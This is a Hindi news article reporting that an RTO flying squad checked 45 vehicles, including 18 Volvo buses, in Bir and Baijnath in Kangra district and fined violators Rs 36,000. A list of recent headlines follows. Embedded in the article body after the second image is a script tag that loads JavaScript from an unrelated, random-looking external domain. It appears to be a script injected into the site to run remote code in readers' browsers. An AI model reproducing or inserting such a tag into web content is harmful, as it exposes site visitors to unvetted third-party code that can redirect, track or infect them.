Categories: हिमाचल

बैजनाथ में RTO ने की 18 वॉल्वो और अन्य बसों की चेकिंग कर वसूला जुर्माना

<p>जिला कांगड़ा के बैजनाथ में कुछ निजी वॉल्वो बसों को लेकर आ रही शिकायतों के बाद आरटीओ फ्लाइंग की टीम ने बीड़ और बैजनाथ में कई वाहनों की चेकिंग की है। इस दौरान 45 वाहनों की चेकिंग की गई। इनमें बीड़ और जोगेंद्रनगर से चल रही 18 वॉल्वो और अन्य बसें भी शामिल हैं। इस दौरान नियमों का उल्लंघन कर रहे वाहनों का चालान कर 36 हजार रुपये जुर्माना वसूल किया गया है। इनमें छह वॉल्वो बसों के चालान भी किए गए हैं। वॉल्वो बसों में एक बस का बिना कपोजिट फीस और पांच बसों का पैसेंजर लिस्ट न होने को लेकर चालान काटा गया।</p>

<p><img src=”/media/gallery/images/image(4995).jpeg” style=”height:456px; width:600px” /></p>

<p>वीरवार शाम को आरटीओ फ्लाइंग डॉ. संजय कुमार धीमान की अगुवाई में हुई इस कार्रवाई से बीड़ से चल रही लग्जरी वोल्वो बसों के संचालकों में हड़कंप मच गया। इसके बाद दस्तावेज पूरे न होने वाली कुछ लग्जरी बसों के यात्रियों को अन्य बसों में दिल्ली भेजा गया। बीड़ और जोगिंद्रनगर से चल रही लग्जरी बसों को लेकर काफी समय से परिवहन विभाग के पास शिकायतें पहुंच रही थी। इस संबंध में कुछ दिन पहले भी बड़ी कार्रवाई अमल में लाई गई थी। उन्होंने बताया कि यहां कुल 45 वाहनों, जिसमें 18 वॉल्वो बसें है। उनके दस्तावेज चेक किए गए हैं। इसमें नियमों का उल्लंघन कर रहे वाहनों से 36 हजार रुपये वसूल किया गया है।</p>

<p><img src=”/media/gallery/images/image(4994).jpeg” style=”height:334px; width:640px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

गोबिंद सागर में पहली बार, गोवा स्टाइल क्रूज का रोमांच

  Bilaspur:प्रदेश में आने वाले पर्यटक अब पहाड़ों के बीच गोबिंद सागर झील में गोवा…

4 hours ago

सीएम मान की हालत स्थिर : फेफड़ों की धमनी में दबाव से रक्तचाप अनियमित

Mohali:पंजाब के मुख्‍यमंत्री भगवंत मान की हालत में सुधार है। चिकित्‍सा विशेषज्ञों ने उन्‍हें अंडर…

6 hours ago

वेणुगोपाल की विक्रमादित्य को नसीहत- राहुल गांधी व खड़गे प्यार और स्नेह फैला रहे, हम नफरत पैदा नहीं कर सकते

  Himachal Politics: हिमाचल प्रदेश के मंत्री विक्रमादित्य सिंह के  भोजनालयों में नेमप्लेट लगाने के…

7 hours ago

हिमाचल विश्वभर में सबसे सुरक्षित पर्यटन गंतव्य के रूप में होगा विकसित: बाली

केंद्रीय विवि के साथ समन्वय स्थापित कर नई पर्यटन परियोजनाएं होंगी तैयार पर्यटन सप्ताह पर…

7 hours ago

हर्ष महाजन बने ऊर्जा संसदीय समिति के सदस्य

  शिमला। राज्यसभा सांसद हर्ष महाजन को संसदीय स्थायी समिति (ऊर्जा) का सदस्य नियुक्त किया…

8 hours ago

कार्निवल के रंगों में डूबने को तैयार धर्मशाला, शोभा यात्रा से करेंगे कृषि मंत्री आगाज

  2 अक्तूबर तक संस्कृति के विभिन्न रंगों से सराबोर होगी कांगड़ा घाटी मुख्यमंत्री करेंगे…

8 hours ago